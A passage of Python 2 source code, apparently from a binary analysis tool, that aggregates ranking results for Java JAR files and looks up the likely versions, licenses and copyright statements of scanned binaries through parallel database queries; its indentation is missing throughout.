if not 'checksum' in unpackreports[i]:
continue
else:
filehash = unpackreports[i]['checksum']
if not os.path.exists(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash)):
continue
if cleanclasses:
if filehash in sha256stofiles:
sha256stofiles[filehash].append(i)
else:
sha256stofiles[filehash] = [i]
## check extension: JAR, WAR, RAR (not Resource adapter), EAR
i_nocase = i.lower()
if i_nocase.endswith('.jar') or i_nocase.endswith('.ear') or i_nocase.endswith('.war') or i_nocase.endswith('.rar'):
if 'tags' in unpackreports[i]:
if 'duplicate' in unpackreports[i]['tags']:
alljarfiles.append(i)
continue
if filehash in sha256seen:
alljarfiles.append(i)
continue
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'rb')
leafreports = cPickle.load(leaf_file)
leaf_file.close()
if 'tags' in leafreports:
## check if it was tagged as a ZIP file
if 'zip' in leafreports['tags']:
## sanity checks
if unpackreports[i]['scans'] != []:
## since it was a single ZIP file there should be only
## one item in unpackreports[i]['scans']
if len(unpackreports[i]['scans']) != 1:
continue
## more sanity checks
if unpackreports[i]['scans'][0]['offset'] != 0:
continue
if unpackreports[i]['scans'][0]['scanname'] != 'zip':
continue
jarfiles.append(i)
sha256seen.append(filehash)
alljarfiles.append(i)
jartasks = []
for i in jarfiles:
classfiles = filter(lambda x: x.endswith('.class'), unpackreports[i]['scans'][0]['scanreports'])
classreports = map(lambda x: unpackreports[x], classfiles)
jartasks.append((i, unpackreports[i], classreports, topleveldir))
ranked = set()
if jartasks != []:
res = pool.map(aggregate, jartasks, 1)
for i in res:
(jarfile, rankres) = i
if rankres:
for j in sha256stofiles[unpackreports[jarfile]['checksum']]:
ranked.add(j)
for i in ranked:
if 'tags' in unpackreports[i]:
unpackreports[i]['tags'].append('ranking')
else:
unpackreports[i]['tags'] = ['ranking']
## if cleanclasses is set the following should be removed:
## * reference in unpackreports (always)
## * pickle of file, only if either unique to a JAR, or shared in several JARs,
## but not when the class file can also be found outside of a JAR.
if cleanclasses:
for i in alljarfiles:
if 'tags' in unpackreports[i]:
if 'duplicate' in unpackreports[i]['tags']:
continue
classfiles = filter(lambda x: x.endswith('.class'), unpackreports[i]['scans'][0]['scanreports'])
for c in classfiles:
filehash = unpackreports[c]['checksum']
if len(sha256stofiles[filehash]) == 1:
try:
os.unlink(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash))
except Exception, e:
print >>sys.stderr, "error removing", c, e
sys.stderr.flush()
sha256stofiles[filehash].remove(c)
else:
sha256stofiles[filehash].remove(c)
del unpackreports[c]
return ranked
## aggregate results for a single JAR file
def aggregate((jarfile, jarreport, unpackreports, topleveldir)):
rankres = {}
matchedlines = 0
matchednonassignedlines = 0
matcheddirectassignedlines = 0
matchednotclonelines = 0
unmatchedlines = 0
reports = []
extractedlines = 0
nonUniqueAssignments = {}
unmatched = []
ignored = []
nonUniqueMatches = {}
totalscore = 0
scoresperpkg = {}
uniqueMatchesperpkg = {}
packageversionsperpkg = {}
packagelicensesperpkg = {}
fieldmatches = {}
classmatches = {}
sourcematches = {}
## from dynamicres
totalnames = 0
uniquematches = 0
namesmatched = 0
packagesmatched = {}
dynamicresfinal = {}
pv = {}
uniquematcheslenperpkg = {}
upp = {}
aggregated = False
for c in unpackreports:
## sanity checks
if not 'tags' in c:
continue
if not 'ranking' in c['tags']:
continue
filehash = c['checksum']
if not os.path.exists(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash)):
continue
## read pickle file
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'rb')
leafreports = cPickle.load(leaf_file)
leaf_file.close()
## and more sanity checks
if not 'binary' in leafreports['tags']:
continue
(stringmatches, dynamicres, varfunmatches, language) = leafreports['ranking']
if language != 'Java':
continue
if 'fields' in varfunmatches:
for f in varfunmatches['fields']:
if not f in fieldmatches:
fieldmatches[f] = varfunmatches['fields'][f]
aggregated = True
else:
fieldmatches[f] += varfunmatches['fields'][f]
if 'classes' in varfunmatches:
for c in varfunmatches['classes']:
if not c in classmatches:
classmatches[c] = varfunmatches['classes'][c]
aggregated = True
else:
classmatches[c] += varfunmatches['classes'][c]
if 'sources' in varfunmatches:
for c in varfunmatches['sources']:
if not c in sourcematches:
sourcematches[c] = varfunmatches['sources'][c]
aggregated = True
else:
sourcematches[c] += varfunmatches['sources'][c]
if stringmatches != None:
aggregated = True
matchedlines = matchedlines + stringmatches['matchedlines']
matchednonassignedlines = matchednonassignedlines + stringmatches['matchednonassignedlines']
matchednotclonelines = matchednotclonelines + stringmatches['matchednotclonelines']
unmatchedlines = unmatchedlines + stringmatches['unmatchedlines']
extractedlines = extractedlines + stringmatches['extractedlines']
if stringmatches['unmatched'] != []:
unmatched = unmatched + stringmatches['unmatched']
if stringmatches['ignored'] != []:
ignored = ignored + stringmatches['ignored']
if stringmatches['nonUniqueAssignments'] != {}:
for n in stringmatches['nonUniqueAssignments'].keys():
if n in nonUniqueAssignments:
nonUniqueAssignments[n] = nonUniqueAssignments[n] + stringmatches['nonUniqueAssignments'][n]
else:
nonUniqueAssignments[n] = stringmatches['nonUniqueAssignments'][n]
if stringmatches['nonUniqueMatches'] != {}:
for n in stringmatches['nonUniqueMatches'].keys():
if n in nonUniqueMatches:
nonUniqueMatches[n] = list(set(nonUniqueMatches[n] + stringmatches['nonUniqueMatches'][n]))
else:
nonUniqueMatches[n] = stringmatches['nonUniqueMatches'][n]
if stringmatches['scores'] != {}:
for s in stringmatches['scores']:
totalscore = totalscore + stringmatches['scores'][s]
if s in scoresperpkg:
scoresperpkg[s] = scoresperpkg[s] + stringmatches['scores'][s]
else:
scoresperpkg[s] = stringmatches['scores'][s]
if stringmatches['reports'] != []:
for r in stringmatches['reports']:
rank = r['rank']
package = r['package']
unique = r['unique']
uniquematcheslen = r['uniquematcheslen']
percentage = r['percentage']
packageversions = r['packageversions']
packagelicenses = r['packagelicenses']
packagecopyrights = r['packagecopyrights']
## ignore rank and percentage
if package in uniqueMatchesperpkg:
tmpres = []
for p in unique:
if p[0] in upp:
continue
else:
tmpres.append(p)
upp[p[0]] = 1
uniqueMatchesperpkg[package] = uniqueMatchesperpkg[package] + tmpres
else:
uniqueMatchesperpkg[package] = unique
if packageversions != {}:
if not package in packageversionsperpkg:
packageversionsperpkg[package] = {}
for k in packageversions:
if k in packageversionsperpkg[package]:
packageversionsperpkg[package][k] = packageversionsperpkg[package][k] + packageversions[k]
else:
packageversionsperpkg[package][k] = packageversions[k]
if package in packagelicensesperpkg:
packagelicensesperpkg[package] = packagelicensesperpkg[package] + packagelicenses
else:
packagelicensesperpkg[package] = packagelicenses
if package in uniquematcheslenperpkg:
uniquematcheslenperpkg[package] += uniquematcheslen
else:
uniquematcheslenperpkg[package] = uniquematcheslen
if dynamicres != {}:
aggregated = True
if 'uniquepackages' in dynamicres:
if dynamicres['uniquepackages'] != {}:
if not 'uniquepackages' in dynamicresfinal:
dynamicresfinal['uniquepackages'] = {}
for d in dynamicres['uniquepackages'].keys():
if d in dynamicresfinal['uniquepackages']:
dynamicresfinal['uniquepackages'][d] = list(set(dynamicresfinal['uniquepackages'][d] + dynamicres['uniquepackages'][d]))
else:
dynamicresfinal['uniquepackages'][d] = dynamicres['uniquepackages'][d]
if not aggregated:
return (jarfile, aggregated)
scores_sorted = sorted(scoresperpkg, key = lambda x: scoresperpkg.__getitem__(x), reverse=True)
rank = 1
reports = []
packagecopyrights = []
for s in scores_sorted:
try:
percentage = (scoresperpkg[s]/totalscore)*100.0
except:
percentage = 0.0
reports.append({'rank': rank, 'package': s, 'unique': uniqueMatchesperpkg.get(s,[]), 'uniquematcheslen': uniquematcheslenperpkg.get(s,0), 'percentage': percentage, 'packageversions': packageversionsperpkg.get(s, {}), 'packagelicenses': list(set(packagelicensesperpkg.get(s, []))), 'packagecopyrights': packagecopyrights})
rank = rank+1
if 'uniquepackages' in dynamicresfinal:
dynamicresfinal['namesmatched'] = reduce(lambda x, y: x + y, map(lambda x: len(x[1]), dynamicresfinal['uniquepackages'].items()))
else:
dynamicresfinal['namesmatched'] = 0
dynamicresfinal['uniquematches'] = uniquematches
dynamicresfinal['totalnames'] = namesmatched
dynamicresfinal['packages'] = packagesmatched
unmatched = list(set(unmatched))
unmatched.sort()
rankres['unmatched'] = unmatched
rankres['ignored'] = list(set(ignored))
rankres['matchedlines'] = matchedlines
rankres['matchednonassignedlines'] = matchednonassignedlines
rankres['matchednotclonelines'] = matchednotclonelines
rankres['unmatchedlines'] = unmatchedlines
rankres['extractedlines'] = extractedlines
rankres['nonUniqueAssignments'] = nonUniqueAssignments
rankres['nonUniqueMatches'] = nonUniqueMatches
rankres['reports'] = reports
## now write the new result
## TODO: only do this if there actually is an aggregate result
filehash = jarreport['checksum']
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'rb')
leafreports = cPickle.load(leaf_file)
leaf_file.close()
leafreports['ranking'] = (rankres, dynamicresfinal, {'classes': classmatches, 'fields': fieldmatches, 'sources': sourcematches}, 'Java')
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'wb')
leafreports = cPickle.dump(leafreports, leaf_file)
leaf_file.close()
return (jarfile, aggregated)
def prune(uniques, package):
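## uniques is a list of (line, res) tuples; res is a list of (checksum, linenumber, versionfilenames)
## tuples, where each entry of versionfilenames starts with the version -- only that element is used here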
if have_counter:
uniqueversions = collections.Counter()
else:
uniqueversions = {}
linesperversion = {}
for u in uniques:
(line, res) = u
versions = set()
for r in res:
(checksum, linenumber, versionfilenames) = r
map(lambda x: versions.add(x[0]), versionfilenames)
for version in versions:
if version in linesperversion:
linesperversion[version].add(line)
else:
linesperversion[version] = set([line])
if have_counter:
uniqueversions.update(versions)
else:
for version in versions:
if version in uniqueversions:
uniqueversions[version] += 1
else:
uniqueversions[version] = 1
## there is only one version, so no need to continue
if len(uniqueversions.keys()) == 1:
return uniques
pruneme = set()
unique_sorted_rev = sorted(uniqueversions, key = lambda x: uniqueversions.__getitem__(x), reverse=True)
unique_sorted = sorted(uniqueversions, key = lambda x: uniqueversions.__getitem__(x))
equivalents = set()
for l in unique_sorted_rev:
if l in pruneme:
continue
if l in equivalents:
continue
linesperversion_l = set(linesperversion[l])
pruneremove = set()
for k in unique_sorted:
if uniqueversions[k] == uniqueversions[l]:
## Both versions have the same number of identifiers, so
## could be the same. If so, add to 'equivalents'
## and skip all equivalents since the results would be the
## same as with the current 'l' and no versions would be
## pruned that weren't already pruned.
if linesperversion[k] == linesperversion_l:
equivalents.add(k)
continue
if uniqueversions[k] > uniqueversions[l]:
break
if set(linesperversion[k]).issubset(linesperversion_l):
pruneme.add(k)
pruneremove.add(k)
## make the inner loop a bit shorter
for k in pruneremove:
unique_sorted.remove(k)
## TODO: pruneme might have length 0, so uniques can be returned. Verify this.
notpruned = set(uniqueversions.keys()).difference(pruneme)
newuniques = []
for u in uniques:
(line, res) = u
newres = []
for r in res:
(checksum, linenumber, versionfilenames) = r
filterres = filter(lambda x: x[0] in notpruned, versionfilenames)
if filterres != []:
newres.append((checksum, linenumber, filterres))
newuniques.append((line, newres))
return newuniques
def determinelicense_version_copyright(unpackreports, scantempdir, topleveldir, processors, scanenv, batcursors, batcons, scandebug=False, unpacktempdir=None):
## sanity check if the database really is there
if batcursors[0] == None:
return None
## the environment might have changed and been cleaned up,
## so overwrite the old one
determineversion = False
if scanenv.get('BAT_RANKING_VERSION', 0) == '1':
determineversion = True
determinelicense = False
if scanenv.get('BAT_RANKING_LICENSE', 0) == '1':
determinelicense = True
determinecopyright = False
if scanenv.get('BAT_RANKING_COPYRIGHT', 0) == '1':
determinecopyright = True
## only continue if there actually is a need
if not determinelicense and not determineversion and not determinecopyright:
return None
## ignore files which don't have ranking results
rankingfiles = set()
filehashseen = set()
hashtoname = {}
rankingfilesperlanguage = {}
for i in unpackreports:
if not 'checksum' in unpackreports[i]:
continue
if not 'tags' in unpackreports[i]:
continue
if not 'identifier' in unpackreports[i]['tags']:
continue
filehash = unpackreports[i]['checksum']
if filehash in hashtoname:
hashtoname[filehash].append(i)
else:
hashtoname[filehash] = [i]
if filehash in filehashseen:
continue
filehashseen.add(filehash)
if not os.path.exists(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash)):
continue
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'rb')
leafreports = cPickle.load(leaf_file)
leaf_file.close()
if not 'identifier' in leafreports:
continue
language = leafreports['identifier']['language']
if language in rankingfilesperlanguage:
rankingfilesperlanguage[language].add(i)
else:
rankingfilesperlanguage[language] = set([i])
if len(rankingfilesperlanguage) == 0:
return None
## Some methods use a database to lookup renamed packages.
clones = {}
clonedb = scanenv.get('HAVE_CLONE_DB')
if clonedb == 1:
conn = batcons[0]
c = batcursors[0]
c.execute("SELECT originalname,newname from renames")
clonestmp = c.fetchall()
conn.commit()
for cl in clonestmp:
(originalname,newname) = cl
if not originalname in clones:
clones[originalname] = newname
## suck the average string scores database into memory. Even with a few million packages
## this will not cost much memory and it prevents many database lookups.
avgscores = {}
for language in avgstringsdbperlanguagetable:
if not language in rankingfilesperlanguage:
continue
if not language in scanenv['supported_languages']:
continue
## open the database containing all the strings that were extracted
## from source code.
conn = batcons[0]
c = batcursors[0]
avgscores[language] = {}
avgquery = "select package, avgstrings from %s" % avgstringsdbperlanguagetable[language]
c.execute(avgquery)
res = c.fetchall()
conn.commit()
for r in filter(lambda x: x[1] != 0, res):
avgscores[language][r[0]] = r[1]
## create a queue for tasks, with a few worker processes reading from the queue,
## looking up results and putting them in a result queue
scanmanager = multiprocessing.Manager()
res = []
if processors == None:
processamount = 1
else:
processamount = processors
## now process each file per language
for language in rankingfilesperlanguage:
if len(rankingfilesperlanguage[language]) == 0:
continue
## create new queues (max: number of tasks or CPUs, whichever is smaller)
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
lock = Lock()
ignorecache = scanmanager.dict()
lookup_tasks = map(lambda x: (unpackreports[x]['checksum'], os.path.join(unpackreports[x]['realpath'], unpackreports[x]['name'])),rankingfilesperlanguage[language])
map(lambda x: scanqueue.put(x), lookup_tasks)
minprocessamount = min(len(lookup_tasks), processamount)
processpool = []
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=lookup_identifier, args=(scanqueue,reportqueue, batcursors[i], batcons[i],scanenv,topleveldir,avgscores,clones,scandebug,ignorecache, lock))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
res.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
## finally shut down the scan manager
scanmanager.shutdown()
for filehash in res:
if filehash != None:
if filehash in hashtoname:
for w in hashtoname[filehash]:
unpackreports[w]['tags'].append('ranking')
## optionally aggregate the JAR files
if 'Java' in rankingfilesperlanguage:
cleanclasses = False
if scanenv.get('AGGREGATE_CLEAN', 0) == '1':
cleanclasses = True
pool = multiprocessing.Pool(processes=processors)
rankedjars = aggregatejars(unpackreports, scantempdir, topleveldir, pool, scanenv, cleanclasses, scandebug=False, unpacktempdir=None)
pool.terminate()
for r in rankedjars:
## results are now aggregated, so add the JAR file to
## the list of rankingfiles for Java
rankingfilesperlanguage['Java'].add(r)
## .class files might have been removed at this point, so sanity check first
rankingfiles = set()
filehashseen = set()
## sanity check to see if all the ranking files are still there
for l in rankingfilesperlanguage:
newrankingfiles = set()
for i in rankingfilesperlanguage[l]:
if i in unpackreports:
newrankingfiles.add(i)
rankingfilesperlanguage[l] = newrankingfiles
## Determine the most likely versions for each of the scanned binaries.
## Currently finding the version is based on unique matches that were found.
## If determinelicense or determinecopyright are set licenses and copyright statements
## are also extracted.
pruning = False
if 'BAT_KEEP_VERSIONS' in scanenv:
keepversions = int(scanenv.get('BAT_KEEP_VERSIONS', 0))
if keepversions > 0:
## there needs to be a minimum number of unique hits (like strings), otherwise
## it's silly
if 'BAT_MINIMUM_UNIQUE' in scanenv:
minimumunique = int(scanenv.get('BAT_MINIMUM_UNIQUE', 0))
if minimumunique > 0:
pruning = True
## first determine whether or not there are any unique links at all and
## if there should be database queries
#alluniques = set()
connectdb = False
for language in rankingfilesperlanguage:
if connectdb:
break
## keep a list of versions per sha256, since source files often are in more than one version
for rankingfile in rankingfilesperlanguage[language]:
if connectdb:
break
unpackreport = unpackreports[rankingfile]
## read the pickle
filehash = unpackreport['checksum']
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'rb')
leafreports = cPickle.load(leaf_file)
leaf_file.close()
(res, functionRes, variablepvs, language) = leafreports['ranking']
if res == None and functionRes == {} and variablepvs == {}:
continue
## First process all the string identifiers
if res != None:
newreports = []
for r in res['reports']:
unique = r['unique']
uniques = set(map(lambda x: x[0], unique))
#alluniques.update(uniques)
if unique != []:
connectdb = True
break
if 'versionresults' in functionRes:
for package in functionRes['versionresults'].keys():
if not 'uniquepackages' in functionRes:
continue
connectdb = True
break
if variablepvs != {}:
if language == 'C':
if 'uniquepackages' in variablepvs:
if variablepvs['uniquepackages'] != {}:
connectdb = True
break
if not connectdb:
return
scanmanager = multiprocessing.Manager()
sha256_filename_query = "select version, pathname from processed_file where checksum=%s"
sha256_license_query = "select distinct license, scanner from licenses where checksum=%s"
sha256_copyright_query = "select distinct copyright, type from extracted_copyright where checksum=%s"
for language in rankingfilesperlanguage:
## keep a list of versions per sha256, since source files often are in more than one version
sha256_versions = {}
for rankingfile in rankingfilesperlanguage[language]:
unpackreport = unpackreports[rankingfile]
## read the pickle
filehash = unpackreport['checksum']
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'rb')
leafreports = cPickle.load(leaf_file)
leaf_file.close()
(res, functionRes, variablepvs, language) = leafreports['ranking']
## indicate whether or not the pickle should be written back to disk.
## If uniquematches is empty, functionRes is empty, and variablepvs
## is also empty, then nothing needs to be written.
changed = False
if res == None and functionRes == {} and variablepvs == {}:
continue
## First process all the string identifiers
if res != None:
newreports = []
for r in res['reports']:
rank = r['rank']
package = r['package']
unique = r['unique']
uniquematcheslen = r['uniquematcheslen']
percentage = r['percentage']
packageversions = r['packageversions']
packagelicenses = r['packagelicenses']
packagecopyrights = r['packagecopyrights']
if unique == []:
## Continue to the next item if there are no unique matches
newreports.append(r)
continue
## There are unique matches, so results should
## be written back to disk
changed = True
newuniques = []
newpackageversions = {}
packagecopyrights = []
packagelicenses = []
uniques = set(map(lambda x: x[0], unique))
lenuniques = len(uniques)
## first grab all possible checksums, plus associated line numbers
## for this string. Since these are unique strings they will only be
## present in the package (or clones of the package).
processpool = []
vsha256s = []
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
map(lambda x: scanqueue.put(x), uniques)
minprocessamount = min(len(uniques), processamount)
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=grab_sha256_parallel, args=(scanqueue,reportqueue,batcursors[i], batcons[i], language, 'string'))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
vsha256s.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
## for each combination (line,sha256,linenumber) store per checksum
## the line and linenumber(s). The checksums are used to look up version
## and filename information.
sha256_scan_versions = {}
tmplines = {}
for l in vsha256s:
(line, versionsha256s) = l
for s in versionsha256s:
(checksum, linenumber) = s
if not checksum in sha256_versions:
if checksum in sha256_scan_versions:
sha256_scan_versions[checksum].add((line, linenumber))
else:
sha256_scan_versions[checksum] = set([(line, linenumber)])
else:
## results are already known, so copy
for v in sha256_versions[checksum]:
(version, filename) = v
if not line in tmplines:
tmplines[line] = []
tmplines[line].append((checksum, linenumber, sha256_versions[checksum]))
processpool = []
fileres = []
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
map(lambda x: scanqueue.put(x), sha256_scan_versions.keys())
minprocessamount = min(len(sha256_scan_versions.keys()), processamount)
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=grab_sha256_filename, args=(scanqueue,reportqueue,batcursors[i], batcons[i], sha256_filename_query))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
fileres.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
resdict = {}
map(lambda x: resdict.update(x), fileres)
## construct the full information needed by other scans
for checksum in resdict:
versres = resdict[checksum]
for l in sha256_scan_versions[checksum]:
(line, linenumber) = l
if not line in tmplines:
tmplines[line] = []
## TODO: store (checksum, linenumber(s), versres)
tmplines[line].append((checksum, linenumber, versres))
for v in versres:
(version, filename) = v
if checksum in sha256_versions:
sha256_versions[checksum].append((version, filename))
else:
sha256_versions[checksum] = [(version, filename)]
for l in tmplines.keys():
newuniques.append((l, tmplines[l]))
## optionally prune version information
if pruning:
if len(newuniques) > minimumunique:
newuniques = prune(newuniques, package)
## optionally fill two lists with sha256 for license scanning and copyright scanning
licensesha256s = []
copyrightsha256s = []
for u in newuniques:
versionsha256s = u[1]
vseen = set()
if determinelicense:
licensesha256s += map(lambda x: x[0], versionsha256s)
if determinecopyright:
copyrightsha256s += map(lambda x: x[0], versionsha256s)
for s in versionsha256s:
(checksum, linenumber, versionfilenames) = s
for v in versionfilenames:
(version, filename) = v
if version in vseen:
continue
if version in newpackageversions:
newpackageversions[version] = newpackageversions[version] + 1
else:
newpackageversions[version] = 1
vseen.add(version)
## Ideally the version number should be stored with the license.
## There are good reasons for this: files are sometimes collectively
## relicensed when there is a new release (example: Samba 3.2 relicensed
## to GPLv3+) so the version number can be very significant for licensing.
## determinelicense and determinecopyright *always* imply determineversion
## TODO: store license with version number.
if determinelicense:
if len(licensesha256s) != 0:
licensesha256s = set(licensesha256s)
processpool = []
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
map(lambda x: scanqueue.put(x), licensesha256s)
minprocessamount = min(len(licensesha256s), processamount)
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=grab_sha256_license, args=(scanqueue,reportqueue,batcursors[i], batcons[i], sha256_license_query))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
packagelicenses.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
packagelicenses_tmp = []
for p in packagelicenses:
packagelicenses_tmp += reduce(lambda x,y: x + y, p.values(), [])
packagelicenses = list(set(packagelicenses_tmp))
if determinecopyright:
if len(copyrightsha256s) != 0:
processpool = []
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
map(lambda x: scanqueue.put(x), copyrightsha256s)
minprocessamount = min(len(copyrightsha256s), processamount)
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=grab_sha256_copyright, args=(scanqueue,reportqueue,batcursors[i], batcons[i], sha256_copyright_query))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
packagecopyrights.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
## result is a list of {sha256sum: list of copyright statements}
packagecopyrights_tmp = []
for p in packagecopyrights:
packagecopyrights_tmp += reduce(lambda x,y: x + y, p.values(), [])
packagecopyrights = list(set(packagecopyrights_tmp))
#newreports.append((rank, package, newuniques, uniquematcheslen, percentage, newpackageversions, packagelicenses, packagecopyrights))
newreports.append({'rank': rank, 'package': package, 'unique': newuniques, 'uniquematcheslen': uniquematcheslen, 'percentage': percentage, 'packageversions': newpackageversions, 'packagelicenses': packagelicenses, 'packagecopyrights': packagecopyrights})
res['reports'] = newreports
## Then process the results for the function names
if 'versionresults' in functionRes:
for package in functionRes['versionresults'].keys():
if not 'uniquepackages' in functionRes:
continue
if not package in functionRes['uniquepackages']:
continue
changed = True
functionnames = functionRes['uniquepackages'][package]
## right now only C is supported. TODO: fix this for other languages such as Java.
processpool = []
vsha256s = []
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
map(lambda x: scanqueue.put(x), functionnames)
minprocessamount = min(len(functionnames), processamount)
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=grab_sha256_parallel, args=(scanqueue,reportqueue,batcursors[i], batcons[i], 'C', 'function'))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
vsha256s.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
sha256_scan_versions = {}
tmplines = {}
for p in vsha256s:
(functionname, vres) = p
for s in vres:
(checksum, linenumber) = s
if not checksum in sha256_versions:
if checksum in sha256_scan_versions:
sha256_scan_versions[checksum].add((functionname, linenumber))
else:
sha256_scan_versions[checksum] = set([(functionname, linenumber)])
else:
for v in sha256_versions[checksum]:
(version, filename) = v
if not functionname in tmplines:
tmplines[functionname] = []
tmplines[functionname].append((checksum, linenumber, sha256_versions[checksum]))
fileres = []
if len(sha256_scan_versions.keys()) != 0:
processpool = []
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
map(lambda x: scanqueue.put(x), sha256_scan_versions.keys())
minprocessamount = min(len(sha256_scan_versions.keys()), processamount)
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=grab_sha256_filename, args=(scanqueue,reportqueue,batcursors[i], batcons[i], sha256_filename_query))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
fileres.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
resdict = {}
map(lambda x: resdict.update(x), fileres)
## construct the full information needed by other scans
for checksum in resdict:
versres = resdict[checksum]
for l in sha256_scan_versions[checksum]:
(functionname, linenumber) = l
if not functionname in tmplines:
tmplines[functionname] = []
## TODO: store (checksum, linenumber(s), versres)
tmplines[functionname].append((checksum, linenumber, versres))
for v in versres:
if checksum in sha256_versions:
sha256_versions[checksum].append((v[0], v[1]))
else:
sha256_versions[checksum] = [(v[0], v[1])]
for l in tmplines.keys():
functionRes['versionresults'][package].append((l, tmplines[l]))
newresults = {}
for package in functionRes['versionresults'].keys():
newuniques = functionRes['versionresults'][package]
## optionally prune version information
if pruning:
if len(newuniques) > minimumunique:
newuniques = prune(newuniques, package)
newresults[package] = newuniques
uniqueversions = {}
functionRes['packages'][package] = []
if have_counter:
vs = collections.Counter()
else:
vs = {}
for u in newuniques:
versionsha256s = u[1]
for s in versionsha256s:
(checksum, linenumber, versionfilenames) = s
if have_counter:
vs.update(set(map(lambda x: x[0], versionfilenames)))
else:
for v in set(map(lambda x: x[0], versionfilenames)):
if v in vs:
vs[v] += 1
else:
vs[v] = 1
for v in vs:
functionRes['packages'][package].append((v, vs[v]))
functionRes['versionresults'] = newresults
## Then process the results for the variable names
if variablepvs != {}:
if language == 'C':
if 'uniquepackages' in variablepvs:
if variablepvs['uniquepackages'] != {}:
changed = True
for package in variablepvs['uniquepackages']:
vartype = 'variable'
if 'type' in variablepvs:
if variablepvs['type'] == 'linuxkernel':
vartype = 'kernelvariable'
uniques = variablepvs['uniquepackages'][package]
processpool = []
vsha256s = []
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
map(lambda x: scanqueue.put(x), uniques)
minprocessamount = min(len(uniques), processamount)
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=grab_sha256_parallel, args=(scanqueue,reportqueue,batcursors[i], batcons[i], language, vartype))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
vsha256s.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
sha256_scan_versions = {}
tmplines = {}
for p in vsha256s:
(variablename, varres) = p
for s in varres:
(checksum, linenumber) = s
if not checksum in sha256_versions:
if checksum in sha256_scan_versions:
sha256_scan_versions[checksum].add((variablename, linenumber))
else:
sha256_scan_versions[checksum] = set([(variablename, linenumber)])
else:
for v in sha256_versions[checksum]:
(version, filename) = v
if not variablename in tmplines:
tmplines[variablename] = []
tmplines[variablename].append((checksum, linenumber, sha256_versions[checksum]))
resdict = {}
if len(sha256_scan_versions.keys()) != 0:
processpool = []
fileres = []
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
map(lambda x: scanqueue.put(x), sha256_scan_versions.keys())
minprocessamount = min(len(sha256_scan_versions.keys()), processamount)
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=grab_sha256_filename, args=(scanqueue,reportqueue,batcursors[i], batcons[i], sha256_filename_query))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
fileres.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
map(lambda x: resdict.update(x), fileres)
## construct the full information needed by other scans
for checksum in resdict:
versres = resdict[checksum]
for l in sha256_scan_versions[checksum]:
(variablename, linenumber) = l
if not variablename in tmplines:
tmplines[variablename] = []
## TODO: store (checksum, linenumber(s), versres)
tmplines[variablename].append((checksum, linenumber, versres))
for v in versres:
if checksum in sha256_versions:
sha256_versions[checksum].append((v[0], v[1]))
else:
sha256_versions[checksum] = [(v[0], v[1])]
for l in tmplines.keys():
variablepvs['versionresults'][package].append((l, tmplines[l]))
newresults = {}
